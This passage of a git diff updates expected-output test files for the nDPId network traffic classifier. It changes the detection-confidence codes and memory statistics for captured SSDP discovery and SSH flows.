00556{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"ssdp-m-search-ua.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1648315275444} 00596{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"ssdp-m-search-ua.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1648315275444,"flow_last_seen":1648315275444,"flow_idle_time":200000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":174,"midstream":0,"thread_ts_msec":1648315275444,"l3_proto":"ip4","src_ip":"192.168.242.50","dst_ip":"239.255.255.250","src_port":56446,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00680{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"ssdp-m-search-ua.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1648315275444,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":216,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":216,"pkt_l4_len":182,"thread_ts_msec":1648315275444,"pkt":"AQBef\/\/68C9LCZO8CABFAADKnWgAAAEReOXAqPIy7\/\/\/+tx+B2wAtraSTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSE9TVDogMjM5LjI1NS4yNTUuMjUwOjE5MDANCk1BTjogInNzZHA6ZGlzY292ZXIiDQpNWDogMQ0KU1Q6IHVybjpkaWFsLW11bHRpc2NyZWVuLW9yZzpzZXJ2aWNlOmRpYWw6MQ0KVVNFUi1BR0VOVDogR29vZ2xlIENocm9tZS85OS4wLjQ4NDQuNzQgTWFjIE9TIFgNCg0K"} -00654{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"ssdp-m-search-ua.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1648315275444,"flow_last_seen":1648315275444,"flow_idle_time":200000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":174,"midstream":0,"thread_ts_msec":1648315275444,"l3_proto":"ip4","src_ip":"192.168.242.50","dst_ip":"239.255.255.250","src_port":56446,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00654{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"ssdp-m-search-ua.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1648315275444,"flow_last_seen":1648315275444,"flow_idle_time":200000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":174,"midstream":0,"thread_ts_msec":1648315275444,"l3_proto":"ip4","src_ip":"192.168.242.50","dst_ip":"239.255.255.250","src_port":56446,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 00680{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"ssdp-m-search-ua.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1648315276445,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":216,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":216,"pkt_l4_len":182,"thread_ts_msec":1648315276445,"pkt":"AQBef\/\/68C9LCZO8CABFAADK4z8AAAERMw7AqPIy7\/\/\/+tx+B2wAtraSTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSE9TVDogMjM5LjI1NS4yNTUuMjUwOjE5MDANCk1BTjogInNzZHA6ZGlzY292ZXIiDQpNWDogMQ0KU1Q6IHVybjpkaWFsLW11bHRpc2NyZWVuLW9yZzpzZXJ2aWNlOmRpYWw6MQ0KVVNFUi1BR0VOVDogR29vZ2xlIENocm9tZS85OS4wLjQ4NDQuNzQgTWFjIE9TIFgNCg0K"} 00680{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"ssdp-m-search-ua.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1648315277449,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":216,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":216,"pkt_l4_len":182,"thread_ts_msec":1648315277449,"pkt":"AQBef\/\/68C9LCZO8CABFAADKWrMAAAERu5rAqPIy7\/\/\/+tx+B2wAtraSTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSE9TVDogMjM5LjI1NS4yNTUuMjUwOjE5MDANCk1BTjogInNzZHA6ZGlzY292ZXIiDQpNWDogMQ0KU1Q6IHVybjpkaWFsLW11bHRpc2NyZWVuLW9yZzpzZXJ2aWNlOmRpYWw6MQ0KVVNFUi1BR0VOVDogR29vZ2xlIENocm9tZS85OS4wLjQ4NDQuNzQgTWFjIE9TIFgNCg0K"} -00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":4,"source":"ssdp-m-search-ua.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1648315275444,"flow_last_seen":1648315278446,"flow_idle_time":200000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":696,"flow_avg_l4_payload_len":174,"midstream":0,"thread_ts_msec":1648315278446,"l3_proto":"ip4","src_ip":"192.168.242.50","dst_ip":"239.255.255.250","src_port":56446,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":4,"source":"ssdp-m-search-ua.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1648315275444,"flow_last_seen":1648315278446,"flow_idle_time":200000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":696,"flow_avg_l4_payload_len":174,"midstream":0,"thread_ts_msec":1648315278446,"l3_proto":"ip4","src_ip":"192.168.242.50","dst_ip":"239.255.255.250","src_port":56446,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 00560{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":4,"source":"ssdp-m-search-ua.pcap","alias":"nDPId-test","packets-captured":4,"packets-processed":4,"total-skipped-flows":0,"total-l4-payload-len":696,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1648315278446} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 4/4 @@ -15,9 +15,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5869567 bytes -~~ total memory freed........: 5869567 bytes -~~ total allocations/frees...: 118118/118118 +~~ total memory allocated....: 6003201 bytes +~~ total memory freed........: 6003201 bytes +~~ total allocations/frees...: 120880/120880 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 472 chars ~~ json string max len.......: 698 chars diff --git a/test/results/ssdp-m-search.pcap.out b/test/results/ssdp-m-search.pcap.out index 6ff5e4c7f..f9f0dee6a 100644 --- a/test/results/ssdp-m-search.pcap.out +++ b/test/results/ssdp-m-search.pcap.out @@ -2,10 +2,10 @@ 00553{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"ssdp-m-search.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1532054645808} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"ssdp-m-search.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1532054645808,"flow_last_seen":1532054645808,"flow_idle_time":200000,"flow_min_l4_payload_len":21,"flow_max_l4_payload_len":21,"flow_tot_l4_payload_len":21,"flow_avg_l4_payload_len":21,"midstream":0,"thread_ts_msec":1532054645808,"l3_proto":"ip4","src_ip":"192.168.242.8","dst_ip":"192.168.242.255","src_port":42253,"dst_port":32412,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"ssdp-m-search.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1532054645808,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":63,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":63,"pkt_l4_len":29,"thread_ts_msec":1532054645808,"pkt":"\/\/\/\/\/\/\/\/AAibydCMCABFAAAxO0tAAEARmRfAqPIIwKjy\/6UNfpwAHf9xTS1TRUFSQ0ggKiBIVFRQLzEuMQ0K"} -00647{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"ssdp-m-search.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1532054645808,"flow_last_seen":1532054645808,"flow_idle_time":200000,"flow_min_l4_payload_len":21,"flow_max_l4_payload_len":21,"flow_tot_l4_payload_len":21,"flow_avg_l4_payload_len":21,"midstream":0,"thread_ts_msec":1532054645808,"l3_proto":"ip4","src_ip":"192.168.242.8","dst_ip":"192.168.242.255","src_port":42253,"dst_port":32412,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00647{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"ssdp-m-search.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1532054645808,"flow_last_seen":1532054645808,"flow_idle_time":200000,"flow_min_l4_payload_len":21,"flow_max_l4_payload_len":21,"flow_tot_l4_payload_len":21,"flow_avg_l4_payload_len":21,"midstream":0,"thread_ts_msec":1532054645808,"l3_proto":"ip4","src_ip":"192.168.242.8","dst_ip":"192.168.242.255","src_port":42253,"dst_port":32412,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"ssdp-m-search.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1532054650808,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":63,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":63,"pkt_l4_len":29,"thread_ts_msec":1532054650808,"pkt":"\/\/\/\/\/\/\/\/AAibydCMCABFAAAxSyxAAEARiTbAqPIIwKjy\/6UNfpwAHf9xTS1TRUFSQ0ggKiBIVFRQLzEuMQ0K"} 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"ssdp-m-search.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1532054655808,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":63,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":63,"pkt_l4_len":29,"thread_ts_msec":1532054655808,"pkt":"\/\/\/\/\/\/\/\/AAibydCMCABFAAAxW1JAAEAReRDAqPIIwKjy\/6UNfpwAHf9xTS1TRUFSQ0ggKiBIVFRQLzEuMQ0K"} -00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":19,"source":"ssdp-m-search.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":19,"flow_first_seen":1532054645808,"flow_last_seen":1532054735808,"flow_idle_time":200000,"flow_min_l4_payload_len":21,"flow_max_l4_payload_len":21,"flow_tot_l4_payload_len":399,"flow_avg_l4_payload_len":21,"midstream":0,"thread_ts_msec":1532054735808,"l3_proto":"ip4","src_ip":"192.168.242.8","dst_ip":"192.168.242.255","src_port":42253,"dst_port":32412,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":19,"source":"ssdp-m-search.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":19,"flow_first_seen":1532054645808,"flow_last_seen":1532054735808,"flow_idle_time":200000,"flow_min_l4_payload_len":21,"flow_max_l4_payload_len":21,"flow_tot_l4_payload_len":399,"flow_avg_l4_payload_len":21,"midstream":0,"thread_ts_msec":1532054735808,"l3_proto":"ip4","src_ip":"192.168.242.8","dst_ip":"192.168.242.255","src_port":42253,"dst_port":32412,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 00560{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":19,"source":"ssdp-m-search.pcap","alias":"nDPId-test","packets-captured":19,"packets-processed":19,"total-skipped-flows":0,"total-l4-payload-len":399,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1532054735808} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 19/19 @@ -15,9 +15,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5869966 bytes -~~ total memory freed........: 5869966 bytes -~~ total allocations/frees...: 118132/118132 +~~ total memory allocated....: 6003600 bytes +~~ total memory freed........: 6003600 bytes +~~ total allocations/frees...: 120894/120894 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 469 chars ~~ json string max len.......: 694 chars diff --git a/test/results/ssh.pcap.out b/test/results/ssh.pcap.out index a2baefdd9..b8f6b8fb4 100644 --- a/test/results/ssh.pcap.out +++ b/test/results/ssh.pcap.out @@ -4,12 +4,12 @@ 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"ssh.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1320435464760,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1320435464760,"pkt":"AAwppUXgAFBWwAAICABFAABAek9AAEAGi52sEO4BrBDuqOQbABY3Xn+qAAAAALAC\/\/+abgAAAgQFtAEDAwMBAQgKHJWv9QAAAAAEAgAA"} 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"ssh.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1320435464760,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1320435464760,"pkt":"AFBWwAAIAAwppUXgCABFAAA8AABAAEAGBfGsEO6orBDuAQAW5BtConY2N15\/q6ASFqC42wAAAgQFtAQCCAoAEyL4HJWv9QEDAwY="} 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"ssh.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1320435464760,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1320435464760,"pkt":"AAwppUXgAFBWwAAICABFAAA0xzVAAEAGPsOsEO4BrBDuqOQbABY3Xn+rQqJ2N4AQ\/\/\/+RgAAAQEIChyVr\/UAEyL4"} -00878{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"ssh.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1320435464760,"flow_last_seen":1320435464768,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":21,"flow_tot_l4_payload_len":21,"flow_avg_l4_payload_len":5,"midstream":0,"thread_ts_msec":1320435464768,"l3_proto":"ip4","src_ip":"172.16.238.1","dst_ip":"172.16.238.168","src_port":58395,"dst_port":22,"l4_proto":"tcp","ndpi": {"flow_risk": {"18": {"risk":"SSH Obsolete Cli Vers\/Cipher","severity":"High","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"SSH","breed":"Acceptable","category":"RemoteAccess"},"ssh": {"client_signature":"SSH-2.0-OpenSSH_5.3","server_signature":"","hassh_client":"","hassh_server":""}} -00886{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":5,"source":"ssh.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1320435464760,"flow_last_seen":1320435464768,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":21,"flow_tot_l4_payload_len":21,"flow_avg_l4_payload_len":4,"midstream":0,"thread_ts_msec":1320435464768,"l3_proto":"ip4","src_ip":"172.16.238.1","dst_ip":"172.16.238.168","src_port":58395,"dst_port":22,"l4_proto":"tcp","ndpi": {"flow_risk": {"18": {"risk":"SSH Obsolete Cli Vers\/Cipher","severity":"High","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"SSH","breed":"Acceptable","category":"RemoteAccess"},"ssh": {"client_signature":"SSH-2.0-OpenSSH_5.3","server_signature":"","hassh_client":"","hassh_server":""}} -01026{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"ssh.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1320435464760,"flow_last_seen":1320435464768,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":21,"flow_tot_l4_payload_len":42,"flow_avg_l4_payload_len":7,"midstream":0,"thread_ts_msec":1320435464768,"l3_proto":"ip4","src_ip":"172.16.238.1","dst_ip":"172.16.238.168","src_port":58395,"dst_port":22,"l4_proto":"tcp","ndpi": {"flow_risk": {"18": {"risk":"SSH Obsolete Cli Vers\/Cipher","severity":"High","risk_score": {"total":500,"client":350,"server":150}},"19": {"risk":"SSH Obsolete Ser Vers\/Cipher","severity":"Medium","risk_score": {"total":510,"client":355,"server":155}}},"confidence": {"4":"DPI"},"proto":"SSH","breed":"Acceptable","category":"RemoteAccess"},"ssh": {"client_signature":"SSH-2.0-OpenSSH_5.3","server_signature":"SSH-2.0-OpenSSH_5.6","hassh_client":"","hassh_server":""}} -01062{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":8,"source":"ssh.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1320435464760,"flow_last_seen":1320435464769,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":904,"flow_tot_l4_payload_len":946,"flow_avg_l4_payload_len":118,"midstream":0,"thread_ts_msec":1320435464769,"l3_proto":"ip4","src_ip":"172.16.238.1","dst_ip":"172.16.238.168","src_port":58395,"dst_port":22,"l4_proto":"tcp","ndpi": {"flow_risk": {"18": {"risk":"SSH Obsolete Cli Vers\/Cipher","severity":"High","risk_score": {"total":500,"client":350,"server":150}},"19": {"risk":"SSH Obsolete Ser Vers\/Cipher","severity":"Medium","risk_score": {"total":510,"client":355,"server":155}}},"confidence": {"4":"DPI"},"proto":"SSH","breed":"Acceptable","category":"RemoteAccess"},"ssh": {"client_signature":"SSH-2.0-OpenSSH_5.3","server_signature":"SSH-2.0-OpenSSH_5.6","hassh_client":"21B457A327CE7A2D4FCE5EF2C42400BD","hassh_server":""}} -01097{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":10,"source":"ssh.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1320435464760,"flow_last_seen":1320435464770,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":904,"flow_tot_l4_payload_len":1730,"flow_avg_l4_payload_len":173,"midstream":0,"thread_ts_msec":1320435464770,"l3_proto":"ip4","src_ip":"172.16.238.1","dst_ip":"172.16.238.168","src_port":58395,"dst_port":22,"l4_proto":"tcp","ndpi": {"flow_risk": {"18": {"risk":"SSH Obsolete Cli Vers\/Cipher","severity":"High","risk_score": {"total":500,"client":350,"server":150}},"19": {"risk":"SSH Obsolete Ser Vers\/Cipher","severity":"Medium","risk_score": {"total":510,"client":355,"server":155}}},"confidence": {"4":"DPI"},"proto":"SSH","breed":"Acceptable","category":"RemoteAccess"},"ssh": {"client_signature":"SSH-2.0-OpenSSH_5.3","server_signature":"SSH-2.0-OpenSSH_5.6","hassh_client":"21B457A327CE7A2D4FCE5EF2C42400BD","hassh_server":"B1C6C0D56317555B85C7005A3DE29325"}} -00939{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":258,"source":"ssh.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":258,"flow_first_seen":1320435464760,"flow_last_seen":1320435713237,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":18498,"flow_avg_l4_payload_len":71,"midstream":0,"thread_ts_msec":1320435713237,"l3_proto":"ip4","src_ip":"172.16.238.1","dst_ip":"172.16.238.168","src_port":58395,"dst_port":22,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"18": {"risk":"SSH Obsolete Cli Vers\/Cipher","severity":"High","risk_score": {"total":500,"client":350,"server":150}},"19": {"risk":"SSH Obsolete Ser Vers\/Cipher","severity":"Medium","risk_score": {"total":510,"client":355,"server":155}}},"confidence": {"4":"DPI"},"proto":"SSH","breed":"Acceptable","category":"RemoteAccess"}} +00878{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"ssh.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1320435464760,"flow_last_seen":1320435464768,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":21,"flow_tot_l4_payload_len":21,"flow_avg_l4_payload_len":5,"midstream":0,"thread_ts_msec":1320435464768,"l3_proto":"ip4","src_ip":"172.16.238.1","dst_ip":"172.16.238.168","src_port":58395,"dst_port":22,"l4_proto":"tcp","ndpi": {"flow_risk": {"18": {"risk":"SSH Obsolete Cli Vers\/Cipher","severity":"High","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"6":"DPI"},"proto":"SSH","breed":"Acceptable","category":"RemoteAccess"},"ssh": {"client_signature":"SSH-2.0-OpenSSH_5.3","server_signature":"","hassh_client":"","hassh_server":""}} +00886{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":5,"source":"ssh.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1320435464760,"flow_last_seen":1320435464768,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":21,"flow_tot_l4_payload_len":21,"flow_avg_l4_payload_len":4,"midstream":0,"thread_ts_msec":1320435464768,"l3_proto":"ip4","src_ip":"172.16.238.1","dst_ip":"172.16.238.168","src_port":58395,"dst_port":22,"l4_proto":"tcp","ndpi": {"flow_risk": {"18": {"risk":"SSH Obsolete Cli Vers\/Cipher","severity":"High","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"6":"DPI"},"proto":"SSH","breed":"Acceptable","category":"RemoteAccess"},"ssh": {"client_signature":"SSH-2.0-OpenSSH_5.3","server_signature":"","hassh_client":"","hassh_server":""}} +01026{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"ssh.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1320435464760,"flow_last_seen":1320435464768,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":21,"flow_tot_l4_payload_len":42,"flow_avg_l4_payload_len":7,"midstream":0,"thread_ts_msec":1320435464768,"l3_proto":"ip4","src_ip":"172.16.238.1","dst_ip":"172.16.238.168","src_port":58395,"dst_port":22,"l4_proto":"tcp","ndpi": {"flow_risk": {"18": {"risk":"SSH Obsolete Cli Vers\/Cipher","severity":"High","risk_score": {"total":500,"client":350,"server":150}},"19": {"risk":"SSH Obsolete Ser Vers\/Cipher","severity":"Medium","risk_score": {"total":510,"client":355,"server":155}}},"confidence": {"6":"DPI"},"proto":"SSH","breed":"Acceptable","category":"RemoteAccess"},"ssh": {"client_signature":"SSH-2.0-OpenSSH_5.3","server_signature":"SSH-2.0-OpenSSH_5.6","hassh_client":"","hassh_server":""}} +01062{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":8,"source":"ssh.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1320435464760,"flow_last_seen":1320435464769,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":904,"flow_tot_l4_payload_len":946,"flow_avg_l4_payload_len":118,"midstream":0,"thread_ts_msec":1320435464769,"l3_proto":"ip4","src_ip":"172.16.238.1","dst_ip":"172.16.238.168","src_port":58395,"dst_port":22,"l4_proto":"tcp","ndpi": {"flow_risk": {"18": {"risk":"SSH Obsolete Cli Vers\/Cipher","severity":"High","risk_score": {"total":500,"client":350,"server":150}},"19": {"risk":"SSH Obsolete Ser Vers\/Cipher","severity":"Medium","risk_score": {"total":510,"client":355,"server":155}}},"confidence": {"6":"DPI"},"proto":"SSH","breed":"Acceptable","category":"RemoteAccess"},"ssh": {"client_signature":"SSH-2.0-OpenSSH_5.3","server_signature":"SSH-2.0-OpenSSH_5.6","hassh_client":"21B457A327CE7A2D4FCE5EF2C42400BD","hassh_server":""}} +01097{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":10,"source":"ssh.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1320435464760,"flow_last_seen":1320435464770,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":904,"flow_tot_l4_payload_len":1730,"flow_avg_l4_payload_len":173,"midstream":0,"thread_ts_msec":1320435464770,"l3_proto":"ip4","src_ip":"172.16.238.1","dst_ip":"172.16.238.168","src_port":58395,"dst_port":22,"l4_proto":"tcp","ndpi": {"flow_risk": {"18": {"risk":"SSH Obsolete Cli Vers\/Cipher","severity":"High","risk_score": {"total":500,"client":350,"server":150}},"19": {"risk":"SSH Obsolete Ser Vers\/Cipher","severity":"Medium","risk_score": {"total":510,"client":355,"server":155}}},"confidence": {"6":"DPI"},"proto":"SSH","breed":"Acceptable","category":"RemoteAccess"},"ssh": {"client_signature":"SSH-2.0-OpenSSH_5.3","server_signature":"SSH-2.0-OpenSSH_5.6","hassh_client":"21B457A327CE7A2D4FCE5EF2C42400BD","hassh_server":"B1C6C0D56317555B85C7005A3DE29325"}} +00939{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":258,"source":"ssh.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":258,"flow_first_seen":1320435464760,"flow_last_seen":1320435713237,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":18498,"flow_avg_l4_payload_len":71,"midstream":0,"thread_ts_msec":1320435713237,"l3_proto":"ip4","src_ip":"172.16.238.1","dst_ip":"172.16.238.168","src_port":58395,"dst_port":22,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"18": {"risk":"SSH Obsolete Cli 